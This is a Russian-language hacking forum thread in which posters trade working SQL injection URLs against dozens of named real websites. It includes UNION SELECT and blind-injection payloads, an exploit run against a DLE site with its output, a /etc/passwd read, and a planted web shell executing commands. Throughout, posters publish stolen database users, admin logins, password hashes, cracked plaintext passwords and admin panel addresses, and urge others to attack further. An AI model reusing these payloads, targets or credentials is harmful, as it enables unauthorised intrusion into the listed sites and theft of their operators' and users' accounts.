Вывод ошибок отключен, дальше не получается че то раскрутить..

http://www.cifracenter.ru/tovar.php?ID=2926%20and%200%20union%20select%201,2 ,concat_ws(0x3a,name,password),4,5,6,7,8,9,10,11%2 0from%20u42265.auth--

http://www.advocat-office.ru/index.php?cp=6%20and%200%20union%20select%201,2,3, 4,5,6,concat_ws(0x3a,login,password,email,version( )),8,9,10%20from%20users%20limit%203,1--

http://slovari.299.ru/word.php?id=34807%20and%200%20union%20select%20con cat_ws(0x3a,password,email),null+from+u7138.User%2 0limit%200,1--

http://www.dako.ua/rus/novelties/?nid=-9999999999999+UNION+SELECT+1,2,3/*
user: dakosql@lo
database: dako
version: 4.0.13



http://hard.nov.ru/brands/A4-Tech/?id_new=-30+UNION+SELECT+1,2,3,4,5,6/*
user: root@localhost
database: hard
version: 5.0.22-log



http://sexshop-online.ru/index.php?part=6+UNION+SELECT+1,2,3,4,5,6,7,8,9,10 ,11,12,13/*
user: u91227@10.10.227.60c
database: u91227
version: 5.0.45-log

_http://www.apt-rent.ru/catalog.php?view=-1+UNION+SELECT+1,2,table_name,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25+FROM+infor mation_schema.tables+LIMIT+16,1/*
От 16 и дальше имена таблиц :)
Одмин mi3d:ueLAIzNPZE

Вот что мне удалось раздобыть. Все таже жопла:

http://www.salsa-tonic.ru/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,passwo rd),user(),5,6,7,8,9,10+FROM+jos_users--

admin:137cf78adb0e92c930853be00babcd95
--------------

http://vsms.ru/show.php?show=news&id=-10+union+select+user()/*
http://www.mbstver.ru/res_1/streets/show.php?id=-10+union+select+user(),2,3,4/*

http://studsovet.ulsu.ru/index.php?pid=8&fac=-1+UNION+SELECT+1,2,3,4,5+FROM+null.user/*
Тока нимагу дальше расшарить((

2 Buffalon

Access denied for user 'studsovet'@'localhost' to database 'mysql'
http://studsovet.ulsu.ru/index.php?pid=8&fac=-1+UNION+SELECT+1,2,3,4,5+from+mysql.user/*

Нет прав на просмотр юзеров

http://www.dvd.inmsk.ru/full_descript.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48, 49,50,51,52,53,54,55,aes_decrypt(aes_encrypt(conca t(user(),char(50),version(),char(50),database()),1 ),1),57/*

compinmsk@localhost24.1.15-Debian_1-log2compinmsk

http://www.proenergy.ru/news.html?news_id=-43/**/union/**/select/**/1,2,3,4,5,6,7,concat(version(),0x3a,database(),0x3 a,user())/*
4.0.27-max-log:proenerg_pcms:proenerg_pcms@v18.valuehost.ru
Вывод ошибки очень информативен :)
------------------------------------------------------------
http://www.lipki.ru/?action=read&t_id=4&c_id=-97/**/union/**/select/**/1,2,3,concat_ws(0x3a,version(),database(),user()), 5,6,7/*&lang=ru
4.0.27-max-log:lipki97:lipki97@v18.valuehost.ru
----------------------------------------------------------
http://www.ritambhara.com/photos.php?galid=330+union+select+1,2,3,version(), 5,6,7/*

http://www.ritambhara.com/basket.php?unitid=5097%20union%20select%201,2,3,4, 5,6,7/*

http://www.ritambhara.com/unit.php?typeid=-220+union+select+1,2,3,4/*

4.0.27-max-log
ritambha_shop@v18.valuehost.ru
ritambha_shop


Форум phpbb но до таблицы наверное нет доступа
---------------------------------------------------------
http://www.teapot.ru/articles.php?id=99999/**/union/**/select/**/1,2,version()/*

4.0.27-max-log
autoepc3@v18.valuehost.ru
autoepc3

http://doctor-al.ru/
http://doctor-al.ru/get_news.php?news_id=-1+UNION+SELECT+1,2,3,VERSION(),5,6,7/*
БД 5, есть какой-то магазин, ПР высокий. Ковырять влом.
http://superski.ru/
http://superski.ru/adm/show.php?news_id=-1+UNION+SELECT+1,2,VERSION(),4,5,6,7/*
ПР 4. БД 5.
http://www.peer.org/
http://www.peer.org/news/news_id.php?row_id=-1+UNION+SELECT+VERSION(),2,3,4/*
БД 4. Какой-то буржуйский ресурс.

2bobob +1 xD

www.jensen-lewis.com
http://www.jensen-lewis.com/product.php?col_id=999999999999+UNION+SELECT+1,2,3 ,4,5/*
5.0.38-Ubuntu_0ubuntu1.2-log
jensenlewis
jl@localhost


www.intecma.de
http://www.intecma.de/scripts/main.php?view_id=9999999+UNION+SELECT+1,2,3,4,5,6/*
5.0.32-Debian_7etch5-log
intecma00
intecma00@localhost

www.anped.org
http://www.anped.org/index.php?part=999999999'+UNION+SELECT+1,2,3,4,5,6 ,7,8,9,10/*
5.0.32-Debian_7etch5-log

www.korce.eu
http://www.korce.eu/panel.php?kategoria=99999999999999+UNION+SELECT+@@ version/*
4.1.22-log

www.wmcoe.gov.uk
http://www.wmcoe.gov.uk/index.php?page=999999999999'+UNION+SELECT+1,2,3,4, 5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/*
5.0.22-community-max-nt

www.ruralhome.org
http://www.ruralhome.org/infoNews.php?id=99999999'+UNION+SELECT+1,2,3,4,5,6 ,7,8,9,10/*
4.1.20-log

Исследовательский центр История фамилии
http://www.familii.ru/index.php?pCode=vote&voteID=73674+union+select+concat_ws(char(58),TABLE _SCHEMA,TABLE_NAME,COLUMN_NAME),2+from+INFORMATION _SCHEMA.COLUMNS/*
http://www.familii.ru/index.php?pCode=vote&voteID=73674+union+select+concat(login,char(58),pa sswd),2+from+users/*
ADMIN:7ab6684faaf74beeccb73263c7030935
serg:c4ca4238a0b923820dcc509a6f75849b = 1;

ИА "День
http://www.dayudm.ru/phorum.php?msid=23185+union+select+1,2,3,4,5,conca t(user,char(58),password),7,8,9,10+from+mysql.user/*

root:*9C02C8F396EAD8B7ACC0B9B4F4CD20135483E3D3
m17617:*1E29CBD36E9AE8BDFC9957759470DDBDF065EA92

Роллеры питера
http://rollerpiter.ru/?p=5+union+select+1,2,3,4,5,6,7,8,9,10,11,concat(u ser(),char(58),database(),char(58),version()),13,1 4/*

http://www.search.uz/
http://www.search.uz/review.php?sid=0x2d33313731303427%20union+select+1 ,2,3,4,concat_ws(0x3a,version(),user(),database()) ,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 ,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38/*
4.1.22-standard:searchu_se@localhost:searchu_se

http://www.shkola.spb.ru/server_news/index.phtml?id=-736+union+select+1,2,3,4,5,6,7,8,9,10,version(),us er(),database(),14,15,16,17,18/*

http://www.shkola.spb.ru/server_news/index.phtml?id=-736+union+select+1,2,3,4,5,6,7,8,9,10,version(),us er(),database(),14,15,16,17,18/*
БОЯН (http://filefront.jino-net.ru/sql.html)

eipcprograms.com - Egyptian International Programming Centerhttp://www.eipcprograms.com/product.php?id=-1+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6,7,8,9,10,11,12,13/* 5.0.24a-log:d60350056:u70382875@cgihost

10-ти летию The Asylum посвящается...http://www.theasylum.cc/product.php?id=-1+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25/*5.0.22:asylum_main1:gf65431@localhost

Таба account с полями user и pass

Пользователь один [ логин : пасс ] : paul : g0g0asylum

http://www.moygolos.ru/article.php?a=author&id=-4'+union+select+1,2,3,4,concat_ws(char(58),email,p ass)+from+user+where+id+limit+0,1/*

http://www.ais.com.ua/
http://www.ais.com.ua/auto_listing.php?page_id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,CONCAT_WS(0 x3a,USER(),VERSION(),DATABASE())/*
root@localhost:4.1.22:ais

http://www.ais.com.ua/

root@localhost:4.1.22:ais
Квырнул дальше:
http://www.ais.com.ua/auto_listing.php?page_id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0 x2A,user,password)+FROM+mysql.user/*
root*183b2d0876ceb447
http://www.ais.com.ua/auto_listing.php?page_id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0 x2A,user,password)+FROM+mysql.user+limit+1,2/*

http://www.laptopshowcase.co.uk/downloads.php?id=1
Подобирать столбцы необходимо с помошью group+by

Mixing of GROUP columns (MIN(),MAX(),COUNT()...) with no GROUP columns is illegal if there is no GROUP BY clause

В итоге правельным будет следующий запрос

_http://www.laptopshowcase.co.uk/downloads.php?id=-1+group+by+10+union+select+1,2,version(),4,5,6,7,8 ,9,0,11/*

И снова ты меня спас)))))

http://research.calacademy.org/research/ichthyology/catalog/getname.asp?rank=species&id=1 or 1=@@version--
ver=Microsoft SQL Server 2000
db=CoFWeb
user=IUSR_MATANGO

http://www.au-pair-box.com/
http://www.au-pair-box.com/FORMfields/examples/gebot/fview_shorttimeemployment.php?__id=-1+UNION+SELECT+CONCAT_WS(0x3A,VERSION(),USER(),DAT ABASE()),LOAD_FILE('/etc/passwd'),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18, 19/*
Есть file_priv, magic_quotes_gpc=off

http://www.showbizlistings.com/
http://www.showbizlistings.com/_sbl_listings/classes_n_photographers_list.php?__id=-1+UNION+SELECT+1,CONCAT_WS(0x3A,USER(),VERSION(),D ATABASE()),3,4,5,6,7,8,9,10,11/*
http://www.hillelatucf.com/
http://www.hillelatucf.com/main.php?page=events_full&__id=-1+UNION+SELECT+1,2,3,4,5,6,7,CONCAT_WS(0x3A,USER() ,VERSION(),DATABASE()),9,10,11,12,13/*
http://www.oregonwineconnection.com/
http://www.oregonwineconnection.com/vieworegonwineries.php?__id=-1+UNION+SELECT+CONCAT_WS(0x3A,USER(),VERSION(),DAT ABASE()),2,3,4,5,6,7,8,9,10,11,12,13,14/*
http://www.webeatforeclosure.com/
http://www.webeatforeclosure.com/index.php?__id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11/*&__cid=2
В последнем вывода нету, если интересно, то можно поиграть с подзапросами, прочитав предварительно статью 1dt.w0lf'a.

http://www.au-pair-box.com/

Есть file_priv, magic_quotes_gpc=off

http://www.au-pair-box.com/FORMfields/examples/gebot/fview_shorttimeemployment.php?__id=-1+UNION+SELECT+concat_ws(0x2A,user,password),2,3,4 ,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+mysq l.user/*
root*7a284bd27d344a90

http://www.bigfork.org/memberCategory.php?CategoryID=null/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,conca t_ws(0x202d20,version(),user(),database())/*
http://www.fetes.org/Category.php?CategoryID=null/**/UNION/**/SELECT/**/concat_ws(0x202d20,version(),user(),database())/*
http://www.ebalongolf.com/products.php?CatID=null/**/UNION/**/SELECT/**/1,2,concat_ws(0x202d20,version(),user(),database() ),4,5,6,7,8,9,10,11,12,13/*
http://www.ocasi.org/index.php?catid=null/**/UNION/**/SELECT/**/concat_ws(0x202d20,version(),user(),database()),2/*
http://ghjobs.org/index.php?pgid=null/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat_ws(0x20 2d20,version(),user(),database())/*
http://www.webcall95.com/index.php?pgid='UNION/**/SELECT/**/1,2,concat_ws(0x202d20,version(),user(),database() ),4,5,6,7/*
http://www.mysliborski.art.pl/gallery_sv.php?katId=null+UNION+SELECT+1,concat_ws (0x202d20,version(),user(),database()),3,4,5,6--


Is it possible to dump something INTO Dumpfile, when magic_quotes_gpc is switched on?
I tried to hex-encode the path, but no file is created then.

Australian Open Shop

SQL inj:

http://www.australianopenshop.com/category.php?id=5+and+1=0+UNION+SELECT+1,version() ,3,4,5,6,7,8,9,10,11,12/*

5.0.27-community-nt

Есть таблица tbluser, и колонки txtusername, txtpassword

http://www.australianopenshop.com/category.php?id=5+and+1=0+UNION+SELECT+1,column_na me,3,4,5,6,7,8,9,10,11,12+from+information_schema. columns+where+table_name=0x74626c75736572+limit+1, 1/*


Получем имя и хэш:

http://www.australianopenshop.com/category.php?id=5+and+1=0+UNION+SELECT+1,concat_ws (0x3a,txtusername,txtpassword),3,4,5,6,7,8,9,10,11 ,12+from+tbluser/*
jowang:b997cf0fe04484502df1f089789efaad

http://www.homeservice.md/else.php?type_of=-1+union+select+1,2,version(),4,5,6,7,8,9,0/*
Version 5.0.45
User 18436@localhost
DB 18436

Техцентр www.nivus.ru

http://www.nivus.ru/prices/?model=-3+union+select+1,2,user(),database(),version()/*


информационный ресурс о шинах, колесных дисках, их производителях и продавцах

http://koleso.topof.ru/news.php?pID=-3058+union+select+1,2,3,4,concat_ws(char(58),TABLE _SCHEMA,TABLE_NAME,COLUMN_NAME),6,7,8,9,10+from+IN FORMATION_SCHEMA.COLUMNS/*

http://koleso.topof.ru/news.php?pID=-3058+union+select+1,2,3,4,concat_ws(char(58),admin _name,admin_login,admin_password),6,7,8,9,10+from+ admins/*

Superadmin:topof:33d51f16ddaf72afb581e2a223c602a1: 4f
News admin:news:fdec339b918fa60443230ce41283de6b:39
Tyre admin:tyre:eee718e1b60f0c56550c1eaecd924f26:ca
Disc admin:disk:18a6699dd4b5e1442dbdd1e9dcea78f9:7e
Auto admin:auto:06ea27e74223350ee155a71ca04e726e:07
v.savosin:v.savosin:1ca91037401683b596009b56b9b473 ef:7f
hadmin:hadmin:9aa2eb5106a1dfacfba636314142ef94:89


http://koleso.topof.ru/admin/login.php

_http://www.sex-shop.ru/kernel.php?section=items%2Fpresentations&action=show&item_id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36,37,38,39/*
1 место в гугле :p _http://www.google.com/search?q=%D1%81%D0%B5%D0%BA%D1%81+%D1%88%D0%BE%D0% BF&sourceid=opera&num=0&ie=utf-8&oe=utf-8

Версия 5 :)

On Conference. Организация и проведение конференций.

http://www.onconference.ru/conferences/index.html?id=-58+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34,35,36,37,38,39,40/*


Аудиторская фирма "Корн-Аудит"

http://cornaudit.ru/sitenews.php?link=-245+union+select+1,2,3,user(),database(),version() ,7,8/*



Компания Zelax является ведущим российским разработчиком и производителем решений для сетей передачи данных.

http://www.zelax.ru/events/news_telecom/new?newsid=-1168+union+select+1,2,concat(user(),char(58),datab ase(),char(58),version()),4,5,6,7/*

http://www.advocat-volodarsky.kiev.ua/index.php?id=23+UNION+SELECT+1,2,3+LIMIT+1,1/*
vvlaw@hosting01.iptelecom.net.ua
volodarsky
4.1.22-log
//**********************************

http://www.htfi.ru/?p=24+UNION+SELECT+1,2,3+LIMIT+1,1/*

us2623d@localhost
5.0.45
db2623b

http://www.ritambhara.com/unit.php?typeid=-530/**/union/**/select/**/1,2,version(),4/*
ritambha_shop
4.0.27-max-log
ritambha_shop@v18.valuehost.ru
есть phpbb, но доступа к таблицам наверное нет :(

типичны пример взлома dle движка через модуль Files
mobila.or.kz
натравляем сплоит
Идет подбор символов...
Меньше 78
Больше 55
Меньше 67
Меньше 62
Меньше 59
Меньше 58
Меньше 57
Символ найден: 9
Больше 78
Больше 101
Меньше 113
Меньше 108
Меньше 105
Меньше 104
Меньше 103
Символ найден: f
Меньше 78
Меньше 55
Больше 44
Больше 50
Меньше 53
Меньше 52
Символ найден: 4
Меньше 78
Меньше 55
Больше 44
Больше 50
Меньше 53
Больше 52
Символ найден: 5
Больше 78
Меньше 101
Больше 90
Больше 96
Меньше 99
Больше 98
Символ найден: c
Меньше 78
Меньше 55
Больше 44
Меньше 50
Больше 48
Символ найден: 1
Больше 78
Меньше 101
Больше 90
Больше 96
Меньше 99
Меньше 98
Символ найден: b
Меньше 78
Больше 55
Меньше 67
Меньше 62
Меньше 59
Меньше 58
Меньше 57
Символ найден: 8
Меньше 78
Меньше 55
Больше 44
Больше 50
Меньше 53
Меньше 52
Символ найден: 4
Меньше 78
Меньше 55
Больше 44
Больше 50
Больше 53
Символ найден: 7
Меньше 78
Больше 55
Меньше 67
Меньше 62
Меньше 59
Меньше 58
Меньше 57
Символ найден: 8
Больше 78
Меньше 101
Больше 90
Больше 96
Меньше 99
Больше 98
Символ найден: c
Меньше 78
Меньше 55
Больше 44
Больше 50
Больше 53
Символ найден: 6
Меньше 78
Меньше 55
Больше 44
Больше 50
Больше 53
Символ найден: 6
Меньше 78
Больше 55
Меньше 67
Меньше 62
Меньше 59
Меньше 58
Меньше 57
Символ найден: 9
Меньше 78
Больше 55
Меньше 67
Меньше 62
Меньше 59
Меньше 58
Меньше 57
Символ найден: 9
Меньше 78
Меньше 55
Больше 44
Меньше 50
Меньше 48
Больше 47
Символ найден: 0
Меньше 78
Меньше 55
Больше 44
Больше 50
Больше 53
Символ найден: 7
Меньше 78
Меньше 55
Больше 44
Больше 50
Больше 53
Символ найден: 6
Меньше 78
Меньше 55
Больше 44
Меньше 50
Больше 48
Символ найден: 2
Меньше 78
Меньше 55
Больше 44
Больше 50
Меньше 53
Меньше 52
Символ найден: 3
Меньше 78
Больше 55
Меньше 67
Меньше 62
Меньше 59
Меньше 58
Меньше 57
Символ найден: 8
Меньше 78
Больше 55
Меньше 67
Меньше 62
Меньше 59
Меньше 58
Меньше 57
Символ найден: 8
Меньше 78
Меньше 55
Больше 44
Больше 50
Меньше 53
Меньше 52
Символ найден: 4
Меньше 78
Больше 55
Меньше 67
Меньше 62
Меньше 59
Меньше 58
Меньше 57
Символ найден: 8
Больше 78
Меньше 101
Больше 90
Больше 96
Больше 99
Символ найден: e
Меньше 78
Больше 55
Меньше 67
Меньше 62
Меньше 59
Меньше 58
Меньше 57
Символ найден: 9
Меньше 78
Меньше 55
Больше 44
Меньше 50
Меньше 48
Больше 47
Символ найден: 0
Больше 78
Меньше 101
Больше 90
Больше 96
Больше 99
Символ найден: d
Больше 78
Меньше 101
Больше 90
Больше 96
Меньше 99
Больше 98
Символ найден: c
Больше 78
Больше 101
Меньше 113
Меньше 108
Меньше 105
Меньше 104
Меньше 103
Символ найден: f
Больше 78
Больше 101
Меньше 113
Меньше 108
Меньше 105
Меньше 104
Меньше 103
Символ найден: f
9f45c1b8478c6699076238848e90dcff
md5(md5('pass')) = 9f45c1b8478c6699076238848e90dcff = 023154
ник админа devil
http://mobila.or.kz/admin.php
идем админить
правда в этом случае шел не удалось залить, но бажных сайтов много
дерзайте))

upi.ru - Урал-пресс-информ

В антибояне вроде нет, но кажись где-то всё же этот узел светился...http://www.upi.ru/show_image_photoset.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),data base(),user()),5,6,7/* 5.0.32-log:articles:upi@localhost

55 таблиц, остальное через мобилу искать внапряг...

К моему верхнему посту
_http://intimshop.ru/kernel.php?section=items%2Fpresentations&action=show&item_id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36,37,38,39/*
Тотже двиг, тоже секс шоп таже 5 версия :)

туда же, ошибка таже :))))
http://www.vibrator.ru
http://eurointim.ru
http://sexshop.mars.fov.ru

Продукт: -----------
Разработчик: www.webroad.ru
Баг: Sql Injection
Google: site:ru inurl:news.php?id1=
Example:
http://dipl.spb.ru/news.php?id1=-288+union+select+1,2,3,concat(login,0x3a,password) ,5,6,7,8,9,10,11,12,13,14+from+ssrusers/*

Result: admin:Lampo4ka
Админка: http://dipl.spb.ru/admin
Comments: Что-то вроде CMS, названия нет, и сайтов под ней штук 20. Баг работает не везде, т.к. при эксплуатации скуль, при слове from в запросе, иногда перебрасывает на http://2.sweb.ru/insecure, а иногда количество полей неверное, придется подбирать самим :)

http://www.enbek.kz/migration/migr_rus.php?mintrud=-1+union+select+1,2,concat(version(),char(13),user( ),char(13),database()),4,5,6,7/*

4.1.7-standard-log
root@localhost
enbek

login:root
pass:Piz01EN

http://www.akciyaleitz.eu/products.php?action=products_list&group=-1+union+select+1,version(),3,4/*

5.0.32-Debian_7etch1-log

http://www.akciyaleitz.eu/admin/index.php

login:akciya
pass:aklz07

login:akstat
pass:akst81

login:akwin
pass:akwn38

если баян не ругаться

_http://www.number.ru/links/index.php?cat=-1+union+select+concat_ws(Char(58),user(),database( ),VERSION()),2,3,4,5,6,7/*

root@localhost:number:4.0.26-log (результат почти в самом низу)



http://www.l-gifts.ru/brandopis.php?brand=-1+union+select+1,null,3,null,5,6,concat_ws(CHAR(58 ),DATABASE(),USER(),VERSION()),8,9,10/*

vittorio:vittorio@pm18.zenon.net:4.0.27-log

www.myadultplanet.com

http://www.myadultplanet.com/view_message.php?folder=&mess_id=3687'
http://www.myadultplanet.com/view_message.php?folder=&mess_id=3687+AND+108%3Cascii(lower(substring(user( ),1,1)))
http://www.myadultplanet.com/view_message.php?folder=&mess_id=3687+AND+120%3Cascii(lower(substring(user( ),2,1)))
http://www.myadultplanet.com/view_message.php?folder=&mess_id=3687+AND+96%3Cascii(lower(substring(user() ,3,1)))
и т.д.

имя юзера: myadultp_main@localhost
название БД: myadultp_main
версия мускула: 4.1.22

угаданные имена таблиц: blogs, messages, groups, events, help, photos, journal, invites, bookmarks

phpinfo:

http://www.myadultplanet.com/phpinfo.php

P.S. Для реализации баги - нужно зарегиться на сайте.

http://www.ayda.ru/stories/show_u.php?u=-1+union+select+1,2,3,4,5,6,7,concat(login,char(58) ,password),9,10,11,12,13,14,15+from+users/*

login:maxversus
pass:Km12hox15

При дальнейшем исследовании оказалось что логин всего один так что скорее всего это админ.

http://www.ebsdublin.com/
http://www.ebsdublin.com/main.php?ID1=1&ID2=0x2d3127%20union+select+1,2,3,4,5,6,7,8,concat _ws(0x2F,version(),database(),user())/*
5.0.45-community-log/EBSDUBL_db/EBSDUBL_web@win9.hosting365.ie


http://evangelistrussellkidman.com/
http://evangelistrussellkidman.com/main.php?id1=0x2d3127%20union+select+1,2,concat_ws (0x2F,version(),database(),user()),4/*
4.0.25/evangel_kidman/evangel_manager@localhost


http://www.e-self.co.kr/
http://www.e-self.co.kr/shop/main.php?page=view_class&class_id=0x2d3127%20union+select+1,2,3,4,5,6,conca t_ws(0x2F,version(),database(),user()),8,9,10,11,1 2/*
4.0.26-log/ns_eself/eself@localhost

http://www.dknews.kz/leftlink.php?linkid=1171&archid=-1+union+select+1,concat(version(),char(58),user(), char(58),database()),3,777,5/*

4.1.22-standard
dknewsk@localhost
dknewsk_manat

http://www.wfsj.org/projects/page.php?id=-62+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(user() ,0x71),0x71),4,5,6,7,8,9,10,11/*
user:wfsj@localhost
ver:4.1.7-nt-max
db:wfsj
таблицы подобрать не получилось :(

http://www.champleague.ru/index.php?cat=rounds&season=1&id=-99999+union+select+1,2,3,concat_ws(0x3a,id,usernam e,password),5,6,7+from+users/*

USER(): rufoot_lch@localhost
VERSION(): 4.1.22-log
DATABASE(): rufoot_lch

1:admin:admin01
где одминка хз :(

*****************************************

http://www.globalwaterfoundation.org/news.php?id=-99999+union+select+1,concat_ws(0x3a,user_id,user_f irst_name,user_last_name,user_username,user_passwo rd),3+from+wma_users/*

USER(): globalwater@web2.4what.net
VERSION(): 5.0.37-community-log
DATABASE(): globalwaterfoundation_org_-_1

4:4What:Interactive:4what:4what
5:Global Water:Foundation:gwf:water

*****************************************

http://www.kvn.com/attorneys_bio.php?id=-99999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20/*

USER(): kvn@localhost
VERSION(): 5.0.24-community-nt
DATABASE(): kvn

hi-tech.mail.ru


http://hi-tech.mail.ru/?id=1027-1
http://hi-tech.mail.ru/?pr=6350-1


Использовать не получилось, никак не выходит отсечь оставшуюся часть строки

Это работает:
http://hi-tech.mail.ru/?id=1026--

А это уже нет:
http://hi-tech.mail.ru/?id=1026-- LALALA

Вариант с /* тоже не канает :(

Может кто знает особенности mail.ru :)

http://gis35.ru/news/?nw_id=-1+union+select+1,concat(version(),char(58),databas e(),char(58),user()),3,4,5,6,7,8,9,10--

выводится в <title>

4.1.22-standard
gis35ru_gisdb
gis35ru_gisdbuse@localhost

Таблицы подобрать не удалось(

http://e.kostanay.kz/?cp=7&url=-1+union+select+table_name+from+information_schema. tables/*

sega@localhost
5.0.32-Debian_7etch4-log
e-akimat

только чего-то не могу я из этих таблиц извлеч имена полей в hex пробовал тоже не получается... если кто сделает просветите

http://www.liter.kz/print.php?lan=russian&id=154&pub=-1+union+select+1,2,3,4,5,concat(version(),char(58) ,user(),char(58),database()),7,8,9,10,11,12/*

5.0.45-community-nt
liter
liter@localhost

http://www.liter.kz/print.php?lan=russian&id=154&pub=-1+union+select+1,2,3,4,5,concat(name,char(58),pass ),7,8,9,10,11,12+from+noc+limit+0,1/*

таблица с логинами и хэшами - noc
root:d150dfc27d456cbcba88a10f71800b72
dina:0bfd678c87231c95741ffb770a2a1a48
viktor:55022818aa052f54aa703a373a067de3
и.т.д.

вот что удалось расшифровать с помощью http://md5.xek.cc/index.php
root:rt1pwd
viktor:archieve

и.т.д.

хотел я зарегать домен maxster.ru,но не судьба, идет переадресация на www.100mat.ru, я решил им отомстить :\

http://www.100mat.ru/ubb/showthreaded.php?Cat=&Board=server&Number=-111+UNION+SELECT+1,2,concat_ws(0x3a,U_Username,U_p assword)+from+w3t_Users+where+/*

.:[ Stylist ]:.:.$e3XHMmHqAco - это на форум

http://www.100mat.ru/ubb/showthreaded.php?Cat=&Board=server&Number=-111+UNION+SELECT+1,2,concat_ws(0x3a,user,password) +from+mysql.user/*

root:vpsuG1271 - это от БД

ну и самое вкусное

http://www.100mat.ru/ubb/shell1.php?cmd=uname -a

1 2 FreeBSD mail.100mat.org.ru 5.4-RELEASE FreeBSD 5.4-RELEASE

file_priv есть, кому интересно разгребайте

http://www.surroundmusic.net/smnews_detail.php?id=99999+union+select+1,2,3,4,5, 6,VERSION(),8,9,10,11,12,13,14,15,16,17,18,19,20,2 1/*
VERSION: 4.1.22-standard
USER: root@localhost
DATABASE: wsr

http://www.leaguestat.com/hockeycanada/rbc_cup/en/stats/player.php?id=99999+union+select+1,2,3,4,5,6,7,8,9 ,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,2 6,27,28,29,30,31,32,33,34,VERSION(),36/*
VERSION: 5.0.22-log
USER: newsport@node3.leaguestat.com
DATABASE: hockeycanada

http://www.americanaustralian.org/Aboutus/mediadisplay.php?Id=99999+union+select+1,VERSION() ,3,4,5,6/*
VERSION: 4.0.27-log
USER: aaanyc@localhost
DATABASE: aaanyc

http://www.voicemagazine.org/authors/authorfull.php?ID=99999+union+select+1,VERSION(),3 ,4/*
VERSION: 5.0.45-community
USER: ocsausu_cmsd@localhost
DATABASE: ocsausu_ausucms

http://www.americancurvesmag.com/goc_details.php?id=99999+union+select+1,2,3,VERSIO N(),5,6,7,8,9,10,11,12,13,14,15,16/*
VERSION: 4.1.21-community-nt
USER: dbmacmag@localhost
DATABASE: mainamericancurvesmag

http://www.americancastiron.com/page.php?id=99999+union+select+1,2,3,4,VERSION(),6 ,7,8,9,10,11,12,13,14,15/*
VERSION: 5.0.46-enterprise-gpl-log
USER: ameri118@216.239.136.13
DATABASE: ameri118